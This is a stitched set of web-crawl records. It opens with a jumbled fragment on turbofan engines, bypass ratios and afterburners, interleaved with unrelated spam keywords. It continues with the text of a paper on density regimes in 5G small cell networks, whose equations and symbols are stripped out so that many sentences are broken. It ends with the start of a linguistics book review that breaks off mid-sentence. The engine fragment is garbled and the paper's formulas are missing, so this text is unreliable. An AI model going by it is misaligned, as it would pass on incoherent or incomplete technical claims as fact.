exhaust velocity/engine specific thrust. The preliminary design phase for this modified engine starts with the aerothermodynamics cycle analysis is consisting of parametric (i.e., on-design) and performance (i.e., off-design) cycle analyses. Current low-bypass military turbofans include the Pratt & Whitney F119, the Eurojet EJ200, the General Electric F110, the Klimov RD-33, and the Saturn AL-31, all of which feature a mixed exhaust, afterburner and variable area propelling nozzle. Trent 1000 cracked blades grounded almost 50 Boeing 787s and reduced ETOPS to 2.3 hours down from 5.5, costing Rolls-Royce plc almost $950 million. Text Only Site Together, these parameters tend to increase core thermal efficiency and improve fuel efficiency. In a zero-bypass (turbojet) engine the high temperature and high pressure exhaust gas is accelerated by expansion through a propelling nozzle and produces all the thrust. efficiency. stream. The engine produces thrust through a combination of these two portions working together; engines that use more jet thrust relative to fan thrust are known as low-bypass turbofans, conversely those that have considerably more fan thrust than jet thrust are known as high-bypass. F The cold duct and core duct's nozzle systems are relatively complex due to there being two exhaust flows. [41], Rotating and static ceramic matrix composite (CMC) parts operates 500 °F (260 °C) hotter than metal and are one-third its weight. thrust To reduce the noise associated with jet flow, the aerospace industry has sought to disrupt shear layer turbulence and reduce the overall noise produced. Coincidentally, the bypass ratio grew to achieve higher propulsive efficiency and the fan diameter increased. 1.6.1 Very Small Bypass Ratio, β ≪ 1, the Turbojet. Unlike the main combustor, where the downstream turbine blades must not be damaged by high temperatures, an afterburner can operate at the ideal maximum (stoichiometric) temperature (i.e., about 2100K/3780Ra/3320F/1826C). report. Afterburner cut view model.PNG 850 × 350; 80 KB. The CFM LEAP introduction was smoother but a ceramic composite HP Turbine coating is prematurely lost, necessitating a new design, causing 60 A320neo engine removal for modification, as deliveries are up to six weeks late. Food Game Shows, Middle Eastern Green Salad, Mountain Dew Zero Sugar, Ryobi Nail Gun, Optometrist Starting Salary 2020, Cv For Electronics Engineer, Lake Texoma Homes For Sale, Ncert Class 7 Science Notes, Apartments Under$900 In Fredericksburg, Va, Entenmann's Chocolate Crème Filled Cupcakes Calories, Greek Alphabet Koine,
2021-01-15 17:20:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3857334554195404, "perplexity": 4653.300096214255}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703495936.3/warc/CC-MAIN-20210115164417-20210115194417-00195.warc.gz"}
https://www.groundai.com/project/density-analysis-of-small-cell-networks-from-noise-limited-to-dense-interference-limited/
Density Analysis of Small Cell Networks: From Noise-Limited to Dense Interference-Limited # Density Analysis of Small Cell Networks: From Noise-Limited to Dense Interference-Limited ## Abstract Considering both non-line-of-sight (NLOS) and line-of-sight (LOS) transmissions, the transitional behaviors from noise-limited regime to dense interference-limited regime have been elaborated for the fifth generation (5G) small cell networks (SCNs). Besides, we identify four performance regimes based on base station (BS) density, i.e., (i) the noise-limited regime, (ii) the signal NLOS-to-LOS-transition regime, (iii) the interference NLOS-to-LOS-transition regime, and (iv) the dense interference-limited regime. To analytically illustrate the performance regime, we propose a unified framework characterizing the future 5G wireless networks over generalized shadowing/fading channels. Simulation results indicate that different factors, i.e., noise, desired signal and interference, successively and separately dominate the network performance with the increase of BS density. Hence, our results shed light on the design and management of SCNs in urban and rural areas with different BS deployment density. ## 1Introduction According to the study of Prof.Webb [1], the wireless capacity has increased about 1 million fold from 1950 to 2000. Data shows that around improvement was achieved by cell splitting and network densification, while the rest of the gain, was mainly obtained from the use of a wider spectrum, better coding techniques and modulation schemes. In this context, network densification has been and will still be the main force to achieve the fold increase of data rates in the future fifth generation (5G) wireless networks [2], due to its large spectrum reuse as well as its easy management. In this paper, we focus on the analysis of transitional behaviors for small cell networks (SCNs) using an orthogonal deployment with the existing macrocells, i.e., small cells and macrocells are operating on different frequency spectrum [4]. Regarding the network performance of SCNs, a fundamental question is: What is the performance trend of SCNs as the base station (BS) density increases? In this paper, we answer this question and identify four performance regimes based on BS density with considerations of non-line-of-sight (NLOS) and line-of-sight (LOS) transmissions. These four performance regimes are: (i) the noise-limited regime, (ii) the signal NLOS-to-LOS-transition regime, (iii) the interference NLOS-to-LOS-transition regime, and (iv) the dense interference-limited regime. To analytically illustrate the performance regime, we propose a unified framework characterizing the future 5G wireless networks over generalized shadowing/fading channels. The main contributions of this paper are listed as follows: • We reveal the transitional behaviors from noise-limited regime to dense interference-limited regime in SCNs and analyze in detail the factors that affect the performance trend. The analysis results will benefit the design and management of SCNs in urban and rural areas with different BS deployment density. • We identify four performance regimes based on BS density. For the discovered regimes, we present tractable definitions for the regime boundaries. More specifically, • The boundary between the noise-limited regime and the signal NLOS-to-LOS-transition regime; • The boundary between the signal NLOS-to-LOS-transition regime and the interference NLOS-to-LOS-transition regime; • The boundary between the interference NLOS-to-LOS-transition regime and the dense interference-limited regime. • An accurate SCN model and generalized theoretical analysis: For characterizing the NLOS-to-LOS transitional behaviors in SCNs, we propose a unified framework, which is applicable to analyze a SCN utilizing the strongest received signal power association, assuming generalized shadowing/fading channels and incorporating both NLOS and LOS transmissions. The reminder of this paper is organized as follows. In Section ?, motivations and some recent work closely related to ours are presented. Section ? introduces the system model and network assumptions. An important theorem used in the analysis on transforming the original network into an equivalent distance-dependent network, i.e., the Equivalence Theorem, is presented and proven in Section ?. Section ? studies the coverage probability and the ASE of SCNs. In Section ?, a comparison with other cell association scheme is provided. In Section ?, the analytical results are validated via Monte Carlo simulations. Besides, the transitional behaviors are elaborated and tractable definitions for the regime boundaries are presented. Finally, Section ? concludes this paper and discusses possible future work. ## 2Motivations and Related Work The modeling of the spatial distribution of SCNs using stochastic geometry has resulted in significant progress in understanding the performance of cellular networks [7]. Random spatial point processes, especially the homogeneous Poisson point process (PPP), have now been widely used to model the locations of small cell BSs in various scenarios. Existing results are likely to analyze the performance assuming that the networks operate in the noise-limited regime or the interference-limited regime. However, the transitional behaviors from noise-limited regime to interference-limited regime were rarely mentioned in their work. Some assumptions in the system model were even conflicted with each other, e.g., in [10] and [11], the millimeter wave networks were assumed to be noise-limited and interference-limited, respectively. Besides, most work is usually based on certain simplified assumptions, e.g., Rayleigh fading, a single path loss exponent with no thermal noise, etc, for analytical tractability, which may not hold in a more realistic scenario. For instance, consider a SCN in urban areas, the path loss model may not follow a single power law relationship in the near filed and thus non-singular [12] or multiple-slop path loss model [14] should be applied. Besides, signal transmissions between BSs and MUs are frequently affected by reflection, diffraction, and even blockage due to high-rise buildings in urban areas, and thus NLOS/LOS transmissions should also be considered [11]. As a consequence, the detailed analysis of transitional behaviors are needed, with considerations of a more generalized propagation model incorporating both NLOS and LOS transmissions, to cope with these new characteristics in SCNs. A number of more recent work had a new look at dense SCNs considering more practical propagation models. The closest system model to the one in this paper are in [15]. In [15], the transitional behaviors of interference in millimeter wave networks was analyzed, but it focused on the medium access control. In [11] and [16], the coverage probability and capacity were calculated based on the smallest path loss cell association model assuming multi-path fading modeled as Rayleigh fading and Nakagami- fading, respectively. However, shadowing was ignored in their models, which may not be very practical for a SCN. The authors of [10] and [17] analyzed the coverage and capacity performance in millimeter wave cellular networks. In [10], self-backhauled millimeter wave cellular networks were analyzed assuming a cell association scheme based on the smallest path loss. In [17], a three-state statistical model for each link was assumed, in which a link can either be in a NLOS, LOS or in an outage state. Besides, both [10] and [17] assumed a noise-limited network ignoring inter-cell interference, which may not be very practical since modern wireless networks generally work in an interference-limited region. In [18], the authors assumed Rayleigh fading for NLOS transmissions and Nakagami- fading for LOS transmissions which is more practical than work in [16]. However, the cell association scheme in [18] is only applicable to the scenario where the SINR threshold is greater than 0 dB. Besides, the ASE performance was not analyzed in [18]. In [12], a near-filed path loss model with bounded pathloss was studied. In [19], a tractable performance evaluation method, i.e., the intensity matching, was proposed to model and optimize the networks. To summarize, in this paper, we propose a more generalized framework to analyze the transitional behaviors for SCNs compared with the work in [15]. Our framework takes into account a cell association scheme based on the strongest received signal power, probabilistic NLOS and LOS transmissions, multi-path fading and/or shadowing. Furthermore, the proposed framework can also be applied to analyze dense SCNs, where BSs are distributed according to non-homogeneous PPPs, i.e., the BS density is spatially varying. ## 3System Model We consider a homogeneous SCN in urban areas and focus on the analysis of downlink performance. Assume that BSs are spatially distributed on an infinite plane and the locations of BSs follow a homogeneous PPP denoted by with an density of , where is the BS index. MUs are deployed according to another independent homogeneous PPP denoted by with an density of . All BSs in the network operate at the same power and share the same bandwidth. Within a cell, MUs use orthogonal frequencies for downlink transmissions and therefore intra-cell interference is not considered in our analysis. However, adjacent BSs may generate inter-cell interference to MUs, which is the main focus of our work. ### 3.1Path Loss Model We incorporate both NLOS and LOS transmissions into the path loss model, whose performance impact is attracting growing interest among researchers recently. In reality, the occurrence of NLOS or LOS transmissions depends on various environmental factors, including geographical structure, distance and clusters, etc. The following definition gives a simplified one-parameter model of NLOS and LOS transmissions. The occurrence of NLOS and LOS transmissions can be modeled using probabilities and , respectively. The probabilities are functions of the distance between a BS and a MU which satisfy where denotes the Euclidean distance between a BS at and the typical MU (aka the probe MU or the tagged MU) located at the origin . Regarding the mathematical form of (or ), N. Blaunstein [20] formulated as a negative exponential function, i.e., , where is a parameter determined by the density and the mean length of the blockages lying in the visual path between the typical MU and BSs. Bai [21] extended N. Blaunstein’s work by using random shape theory which shows that is not only determined by the mean length but also the mean width of the blockages. The authors of [17] and [21] approximated by using piece-wise functions and step functions, respectively. The authors of [16] considered to be a linear function and a two-piece exponential function, respectively; both are recommended by the 3GPP. It should be noted that the occurrence of NLOS (or LOS) transmissions is assumed to be independent for different BS-MU pairs. Though such assumption might not be entirely realistic, e.g., NLOS transmissions caused by a large obstacle may be spatially correlated, the authors of [21] showed that the impact of the independence assumption on the SINR analysis is negligible. Note that from the viewpoint of the typical MU, each BS in the infinite plane is either a NLOS BS or a LOS BS to the typical MU. Accordingly, we perform a thinning procedure on points in the PPP to model the distributions of NLOS BSs and LOS BSs, respectively. That is, each BS in will be kept if a BS has a NLOS transmission with the typical MU, thus forming a new point process denoted by . While BSs in form another point process denoted by , representing the set of BSs with LOS path to the typical MU. As a consequence of the independence assumption between LOS and NLOS transmissions mentioned above, and are two independent non-homogeneous PPPs with intensity1 and , respectively. In general, NLOS and LOS transmissions incur different path losses captured by2 and where the path loss is expressed in dB unit, and are the path losses at the reference distance (usually at 1 meter), and are respective path loss exponents for NLOS and LOS transmissions, and are independent Gaussian random variables with zero means, i.e., and , reflecting the signal attenuation caused by shadow fading. The corresponding model parameters can be found in [22]. Accordingly, the received signal power for NLOS and LOS transmissions in W (watt) can be expressed by and respectively, where (or ) denotes log-normal shadowing for NLOS (or LOS) transmission, and , and are all constants. Therefore, the received power by the typical MU from BS is given by where is a random indicator variable, which equals to 1 for NLOS transmission and 0 for LOS transmission, and the corresponding probabilities are and , respectively, i.e., Based on the path loss model discussed above, for downlink transmissions, the SINR experienced by the typical MU associated with BS can be written by where is the Palm point process [26] representing the set of interfering BSs in the network to the typical MU and denotes the noise power at the MU side, which is assumed to be the additive white Gaussian noise (AWGN). ### 3.2Cell Association Scheme Considering NLOS and LOS transmissions, two cell association schemes can be chosen, i.e., the maximum average received power and the maximum instantaneous SINR. In our work, we assume the typical MU should connect with the BS that provides the highest SINR [8]. More specifically, the typical MU associates itself to the BS given by Intuitively, the highest SINR association is equivalent to the strongest received signal power association. Such intuition is formally presented and proved in Lemma ?. Lemma ? states that providing the highest SINR is equivalent to providing the strongest received power to the typical MU. It follows from Eq. (Equation 6) and Lemma ? that the BS associated with the typical MU can also be written as where , and the set . In the following, we mainly use Eq. (Equation 7) to characterize the considered cell association scheme. ## 4The Equivalence of SCNs and the Distribution of the Strongest Received Signal Power Before presenting our main analytical results, first we introduce the Equivalence Theorem that will be used throughout the paper. The purpose of introducing the Equivalence Theorem is to unify the analysis considering different multi-path fading and/or shadowing, and to reduce the complexity of our theoretical analysis. Then based on this theorem, we derive the cumulative distribution function (CDF) of the strongest received signal power. ### 4.1The Equivalence of SCNs In this subsection, an equivalent SCN to the one being analyzed will be introduced, which specifies how the intensity measure and the intensity are changed after a transformation of original PPPs. More specifically, denoting by and the received signal power in Eq. (Equation 1) and Eq. (Equation 2) can be written as and From the discussion in Subsection ?, the BS’s location can be viewed as a non-homogeneous PPP with an equivalent intensity of . Through the above transformation which scales the distances between the typical MU and all other BSs using Eq. (Equation 8) and (Equation 9), the scaled point process for NLOS BSs (or LOS BSs) still remains a PPP denoted by (or ) according to the displacement theorem [28]. The intuition is that in the equivalent networks, the received signal power and cell association scheme are only dependent on the new equivalent distance (or ) between the BSs and the typical MU, while the effects of transmit power, multi-path fading and shadowing are incorporated into the equivalent intensity (or the equivalent intensity measure) of the transformed point process. Besides, and are mutually independent because of the independence between and . As a result, the performance analysis involving path loss, multi-path fading, shadowing, etc, can be handled in a unified framework. This motivates the following theorem. In [29], a similar theorem which was also extended from Blaszczyszyn’s work [8] was proposed to analyze a -dimensional network, in which NLOS and LOS transmissions are not considered. By utilizing the Equivalence theorem above, the transformed cellular network has the exactly same performance for the typical MU with respect to the coverage probability and the ASE compared with the original network, which is proved in Appendix A and validated by Monte Carlo simulations in Section ?. After transformation, the received signal power and cell association scheme are only dependent on the equivalent distance between the BSs and the typical MU, i.e., and , while the effects of transmit power, multi-path fading and shadowing are incorporated into the equivalent intensity shown in Eq. ( ?) and Eq. ( ?). Therefore, the complexity of theoretical analysis can be significantly reduced. In the next subsection, we will provide an application of the Equivalence theorem, i.e., using the equivalence theorem to derive the distribution of the strongest received signal power. ### 4.2The Distribution of the Strongest Received Signal Power In this subsection, we use stochastic geometry and Theorem ? to obtain the distribution of the strongest received signal power. Then we will use simulation results to validate our theoretical analysis. If a specific NLOS/LOS transmission model is given, the distribution of the strongest received signal power can be easily derived using Lemma ?. The following is an example assuming that the LOS transmission probability follows a negative exponential distribution. Assume that and , where is a constant determined by the density and the mean length of blockages lying in the visual path between the typical MU and the connected BS [11], then the CDF of the strongest received signal power is given by Eq. ( ?). Fig. ? illustrates the CDF of the strongest received signal power and it can be seen that the simulation results perfectly match the analytical results. From Fig. ?, we can find that over 50% of the strongest received signal power is larger than -51 dBm when and this value increases by approximately 16 dB when , which indicates that the strongest received signal power improves as the BS density increases. ## 5The Coverage Probability and ASE Analysis In downlink performance evaluation, for networks where BSs are random distributed according to a homogeneous PPP, it is sufficient to study the performance of the typical MU located at the origin to characterize the performance of a SCN using the Palm theory [26]. In this section, the coverage probability is firstly investigated and then the ASE will be derived from the results of coverage probability. The coverage probability is generally defined as the probability that the typical MU’s measured SINR is greater than a designated threshold , i.e., where the definition of SINR is given by Eq. (Equation 5) and the subscript is omitted here for simplicity. Now, we present a main result in this section on the coverage probability as follows. The coverage probability evaluated by Eq. ( ?) in Theorem ? is at least a 3-fold integral which is complicated for numerical computation. However, Theorem ? gives general results that can be applied to various multi-path fading or shadowing models, e.g., Rayleigh fading, Nakagami- fading, etc, and various NLOS/LOS transmission models as well. In the following, we focus on studying a special scenario in which a simplified NLOS/LOS transmission model is adopted for ease of numerical evaluations, which is expressed as follows where is a constant distance below which all BSs connect with the typical MU with LOS transmissions. This model has been used in some recent work [11]. With assumptions above, the intensity measure for NLOS transmissions, i.e., , is expressed as follows where is the complementary error function, , and are all constants. After obtaining , the density of NLOS BSs, i.e., , can be readily derived as follows Similarly, the intensity measure and density for LOS BSs are respectively, where , and are all constants. By substituting and above into Eq. ( ?) and Eq. ( ?), the coverage probability can be obtained in this specific scenario, followed by results in Section ?. In the above scenario, the shadowing follows log-normal distributions. However, Theorem ? can also be applied to a generalized shadowing/fading model and the coverage probability with Rayleigh fading will be derived in Section ?. In the following, an asymptotic analysis will be given for the situation where BS deployment becomes ultra dense, i.e., , which helps to analyze the performance with a concise form. From Corollary ?, it can be concluded that for dense SCNs the coverage probability is invariant with respect to BS density and even the distribution of shadowing/fading. However, when the BS density is not dense enough, the coverage probability reveals an interesting performance, which will be fully studied in Section ?. Finally, the ASE in units of for a given BS density can be derived as follows ## 6Comparisons with Other Cell Association Schemes In this section, we will apply Theorem ? to a SCN with Rayleigh fading. Moreover, the strongest received signal power association scheme is compared with the nearest BS association scheme to evaluate the performance impact of the two different cell association schemes. For brevity, we denote SPAS and NBAS by the Strongest Power Association Scheme and the Nearest BS Association Scheme, respectively. As the majority of previous work considered Rayleigh fading and ignored log-normal shadowing, in this part we will apply our proposed model to Rayleigh fading scenario for the sake of a fair comparison. The main difference for theoretical analysis when replacing log-normal shadowing with Rayleigh fading lies in the intensity measure and the intensity. Assuming that and follow exponential distributions with rates and , respectively, then , , , can be calculated based on Theorem ? as follows and where and denote the upper and the lower incomplete gamma functions, respectively, is the gamma function. By incorporating Eq. (Equation 17) - (Equation 20) into Eq. ( ?), the coverage probability of a SCN experiencing Rayleigh fading while using SPAS can be calculated. We omit the rest of derivations for brevity. In this part, the coverage probability will be provided by applying NBAS. Two scenarios will be considered, i.e., with consideration of NLOS and LOS transmissions and without considering the coexistence of NLOS and LOS transmissions, for comparisons with SPAS. With consideration of NLOS and LOS transmissions: The derivations are very similar to the work in [30] and we just present the results as follows Without considering the coexistence of NLOS and LOS transmissions: If we do not differentiate NLOS and LOS transmissions, the coverage probability using NBAS is given in [7] as follows where and ## 7Simulations and Discussions This section presents numerical results to validate our analysis, followed by discussions to shed new light on the performance of SCNs. We use the following parameter values, , , , , , , 3, , , 4, and [11]. ### 7.1Validation of the Analytical Results of pc(λ,T) with Monte Carlo Simulations Fig. ? illustrates the coverage probability with respect to different SINR thresholds. We can observe that the analytical results (solid lines or dash lines) match well with the simulation results (markers), which validate our analytical analysis. The coverage probability decrease with the increase of SINR threshold, which is intuitively correct as a higher SINR threshold requires a higher signal quality. We also plot figures adopting different shadowing/fading models, i.e., log-normal shadowing and Rayleigh fading. To fully study the SINR coverage probability with respect to BS density, the results of configured with and assuming SPAS are plotted in Fig. ? and Fig. ?. As can be observed from Fig. ?, the analytical results match the simulation results well with respect to various BS intensities from to . With the assistance of Fig. ?, we conclude that the performance of small cell networks can be divided into four different regimes according to the density of small cell BSs, where in each regime, the performance is dominated by different factors. • Noise-Limited Regime (NLR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, the typical MU is likely to have a NLOS path with the serving BS. The network in the NLR regime is very sparse and thus the interference can be ignored compared with the thermal noise if we use SINR for performance metric. In this case, and the coverage probability will increase with the increase of as the strongest received power () will grow and noise power () will remain the same. While if we use SIR for performance metric, the SIR coverage probability remain almost stable in this regime as increases. This is because the increase in the received signal power is counterbalanced by the increase in the aggregate interference power. Besides, as the aggregate interference power is smaller than noise power, the SIR coverage probability is larger than the SINR coverage probability. • Signal NLOS-to-LOS-Transition Regime (SN2LTR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, when is small, the typical MU has a higher probability to connect to a NLOS BS; while when becomes larger, the typical MU has an increasingly higher probability to connect to a LOS BS. That is to say, with the increase of , the typical MU is more likely to be in LOS with the associated BS, i.e., the received signal transforms from NLOS to LOS path. Even though the associated BS is LOS, the majority of interfering BSs are still NLOS in this regime and thus the SINR (or SIR) coverage probability keeps growing. Besides, from this regime on, noise power has a negligible impact on coverage performance, i.e., the SCN is interference-limited. • Interference NLOS-to-LOS-Transition Regime (IN2LTR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, the typical MU is connected to a LOS BS with a high probability. However, different from the situation in the SN2LTR, the majority of interfering BSs experience transitions from NLOS to LOS path, which causes much more severe interference to the typical MU compared with NLOS interfering BSs. As a result, the SINR (or SIR) coverage probability decreases as the increase of because the transition of interference from NLOS path to LOS path causes a larger increase in interference compared with that in signal. • Dense Interference-Limited Regime (DILR): ( in Fig. ( ?) and using the parameters in the simulation). In this regime, the network is extremely dense and grow close to the LOS-BS-only scenario as the increase of . The SINR (or SIR) coverage probability will become stable with the increase in BS density as any increase in the received LOS BS signal power is counterbalanced by the increase in the aggregate LOS BS interference power, which is also illuminated by Corollary ?. Another interesting observation in Fig. ? is that the network experiencing Rayleigh fading outperforms that experiencing log-normal shadowing when the network is sparse, while the network experiencing log-normal shadowing outperforms that experiencing Rayleigh fading when SCNs becomes dense. However, this phenomenon is highly related to the assumed SINR threshold, which is shown in Fig. ?. If the SCN becomes ultra dense, the coverage probability approaches the same asymptotic value regardless of shadowing or fading model. In Fig. ?, we compare the performance of different cell association schemes using NBAS as a baseline. To guarantee the fairness of comparison, Rayleigh fading is assumed for all studied scenarios. It is observed that by assuming SPAS, the coverage probability have a considerable gain compared with that assuming NBAS, with the peak coverage probability rising from 0.6 to 0.8. Besides, we also plot figures which are exclusive of NLOS/LOS transmissions, i.e., signal-slope path loss model [7] is adopted. It is found that the coverage probability firstly increase with the increase of BS density and then becomes stable and independent of when the SCN is dense, if we adopt parameters of NLOS transmissions to the signal-slope path loss model. In comparison, the coverage probability is stable even when the BS density is rather sparse, if we adopt parameters of LOS transmissions to the signal-slope path loss model. ### 7.2Boundary Definitions Based on the qualitative results above, it is interesting to develop a qualitative definition of the boundaries among adjacent regimes. In this subsection, we propose the following definition to characterize three BS density boundaries, which makes the analysis of SCNS more formal. The intuition of this definition is when , the aggregate interference has a greater impact on network performance than that caused by noise. The definition above reveals that is the maximum coverage probability if other parameters are fixed. When , LOS interference will degrade the coverage performance. When becomes larger and larger, the SCNs fall into the DILR, i.e., the aggregate interference might be extremely large, which is shown by Eq. ( ?). In the following, we will analyze the ASE performance in the four defined regimes. ### 7.3Discussion on the Analytical Results of ASE(λ) In this part, the ASE with is evaluated analytically only, as is a function of shown in Eq. (Equation 16). Fig. ? illustrates the ASE with different cell association schemes vs. BS density . It is found that the ASE of the sparse SCN has a similar growth tendency with that of the SCN which employs NLOS transmission configurations, while the ASE of dense SCN approaches the performance of the SCN which employs LOS transmission configurations. Specifically, when the SCN is in the NLR and SN2LTR, e.g., , the ASE quickly increases with because the network is generally noise-limited or the aggregate interference power is relatively low, and thus adding more small cells immensely benefits the ASE of the SCN. And when the network is in the front section of IN2LTR , i.e., , the ASE exhibits a slowing-down in the rate of growth due to the fast decrease of the coverage probability at , which is shown in Fig. ?, Fig. ? and Fig. ?. Second, when , the ASE will pick up the growth rate since the decrease of the coverage probability becomes a minor factor compared with the increase of BS density . Finally, when the SCN becomes extremely dense, i.e., in the DILR, the ASE exhibits a nearly linear trajectory with regard to because both the signal power and the interference power are now LOS dominated, and thus statistically stable as explained before. ### 7.4Guidance on Network Design Based on the findings of NLOS-to-LOS-transition, in this subsection we will introduce some guidance on how to design and manage the cellular networks in order to optimize the network performance as we evolve into dense SCNs. As described in section ? and ?, the ASE increases almost for sure as SCNs becomes denser due to the gain of frequency reuse. In contrast, the coverage probability of SCNs will firstly increase and then decrease with the increase of BS density . In this context, there is a trade off between the coverage probability and the ASE in the future 5G SCNs incorporating both NLOS and LOS transmissions. While in [7], denser SCNs always provide better network performance with respect to the ASE as well as the coverage probability. According to the data, the current 4G network is operating in the SN2LTR. As we deploy more and more BSs in the future to meet the skyrocketing demands on wireless data, the network will fall into the IN2LTR. In this regime, we need elaborately design the network system including transmission techniques, medium access control (MAC) protocols and coding techniques, etc, to compensate the impair of network coverage caused by strong LOS interference. The most common MAC protocols are interference cancellation, interference avoidance and interference control. By jointly utilizing advanced transmission techniques like beamforming techniques, multiple-input multiple-output (MIMO), multi-antenna, coordinated multi-point (CoMP) transmissions and better coding techniques, the interference will be mitigated to a acceptable level, which benefits both the coverage probability and the ASE a lot. ## 8Conclusions and Future Work In this paper, we illustrated the transition behaviors in SCNs incorporating both NLOS and LOS transmissions. Based on our analysis, the network can be divided into four regimes, i.e., the NLR, the SN2LTR, the IN2LTR and the DILR, where in each regime the performance is dominated by different factors. The analysis helps to understand as the BS density grows continually, which dominant factor that determines the cellular network performance and therefore provide guidance on the design and management of the cellular networks as we evolve into dense SCNs. Moreover, our work adopt a generalized shadowing/fading model, in which log-normal shadowing and/or Rayleigh fading can be treated in a unified framework. In our future work, shadowing and multi-path fading model will be considered simultaneously which is more practical for the real network. Furthermore, heterogeneous networks (HetNets) incorporating both NLOS and LOS transmissions will also be investigated. ## Appendix A: Proof of Theorem Firstly, we will obtain the intensity measure of ; and then the intensity will be easily acquired by taking a derivation of . By using displacement theorem [8], the point process is Poisson with intensity measure where is a ball centered at the origin with radius and results by converting from Cartesian to polar coordinates. Then the intensity of denoted by can be given by Note that to ensure the intensity measure is finite for any bounded set (a set is bounded if it can be contained in a ball with a finite radius), has to satisfy a certain condition. As , from Eq. (Equation 21), we get an inequality as follows If the expectation , then . Using similar approach, the intensity measure and intensity of the PPP are obtained by Eq. ( ?) and Eq. ( ?), respectively. As for the cell association scheme, it is obvious that the original scheme is equivalent to the scheme which actually corresponds to the nearest BS association scheme. Thus the proof is completed. ## Appendix B: Proof of Lemma Denote the strongest NLOS received signal power and the strongest LOS received signal power by and , respectively. That is, and . Then the probability can be derived as where the notation refers to the number of points contained in the set , while equality follows from the independence of PPP and PPP , and comes from the fact that the void probability for a non-homogeneous PPP. Then the rest of the proof is straightforward. ## Appendix C: Proof of Theorem By invoking the law of total probability, the coverage probability can be divided into two parts, i.e., and , which denotes the conditional coverage probability given that the typical MU is associated with a BS in and , respectively. Moreover, denote by and the strongest received signal power from BS in and , i.e., and , respectively. Then by applying the law of total probability, can be computed by where is the equivalent distance between the typical MU and the BS providing the strongest received signal power to the typical MU in , i.e., , and also note that . Besides, Part I guarantees that the typical MU is connected to a LOS BS and Part II denotes the coverage probability conditioned on the proposed cell association scheme in Eq. (Equation 7). Next, Part I and Part II will be respectively derived as follows. For Part I, where , similar to the definition of , is the equivalent distance between the typical MU and the BS providing the strongest received signal power to the typical MU in , i.e., , and also note that , and follows from the void probability of a PPP. For Part II, we know that where and denote the aggregate interference from NLOS BSs and LOS BSs, respectively. The conditional coverage probability is derived as follows where denotes the SINR when the typical MU is associated with a LOS BS, the inner integral in is the conditional PDF of , and
2019-06-20 15:30:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8405115008354187, "perplexity": 633.6142156789925}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999261.43/warc/CC-MAIN-20190620145650-20190620171650-00272.warc.gz"}
https://www.degruyter.com/view/j/zfsw.2019.38.issue-2/zfs-2019-2005/zfs-2019-2005.xml
Show Summary Details More options … Open access from 2017! # Zeitschrift für Sprachwissenschaft IMPACT FACTOR 2018: 0.650 5-year IMPACT FACTOR: 0.737 CiteScore 2018: 0.60 SCImago Journal Rank (SJR) 2018: 0.267 Source Normalized Impact per Paper (SNIP) 2018: 0.396 Open Access Online ISSN 1613-3706 See all formats and pricing More options … Volume 38, Issue 2 # Paul M. Pietroski:Conjoining Meanings. Semantics Without Truth Values Kai-Uwe Carstensen Published Online: 2019-09-14 | DOI: https://doi.org/10.1515/zfs-2019-2005 ## Reviewed publication Paul M. Pietroski: Conjoining Meanings. Semantics Without Truth Values. Oxford: Oxford University Press (Context and Content), 2018, X + 393 pages. There is an enormous range of theories of meaning in linguistics and philosophy, and most notably, there is still a wide gap between logical and (especially cognitive) linguistic approaches. With his monograph Conjoining Meanings (henceforth CM), Paul M. Pietroski sets out to join the communities and to bridge this gap with an “internalist semantics” approach to meaning that is cognitive in the Chomskyan sense, but rooted in modern logic. In Chapter 0 “Overture”, Pietroski introduces the core assumptions of CM treated in more depth in later chapters. He starts by saying that human natural languages (which he calls “Slangs”) are generative procedures that connect meanings with pronunciations. Continuing with what meanings are not, he rejects both the notion ‘meanings are concepts’ (i. e., to identify meanings and concepts) and ‘meanings are extensions’ (or corresponding/equivalent truth-conditional conceptions, i. e., the propositional and Davidsonian stances according to Speaks 2018). Instead, Pietroski proposes to view meanings as instructions for how to access simple concepts or build complex concepts. As to semantic composition, he notes that Frege’s functor-argument apparatus and derivatives like type-theoretic Lambda calculus are much too powerful to model human meaning composition. The alternative he then previews is based on a restricted kind of predication (only classificatory monadic concepts of type $⟨\text{M}⟩$ and relational dyadic concepts of type $⟨\text{D}⟩$) with corresponding compositional operations (M-junction, D-junction). Chapter 1 elaborates on the linguistic reasons for assuming a mentalist, generative, non-extensional approach, where meaning is neither based on extensions or representations of extensions, nor on relations to truth values (contrary to Lewisian, Davidsonian, and also Montagovian approaches). To exemplify his points, Pietroski uses linguistic ambiguities, Putnam’s “water” case, and Liar sentences. Chapter 2 introduces concepts as “composable mental symbols that can be used to think about things” (p. 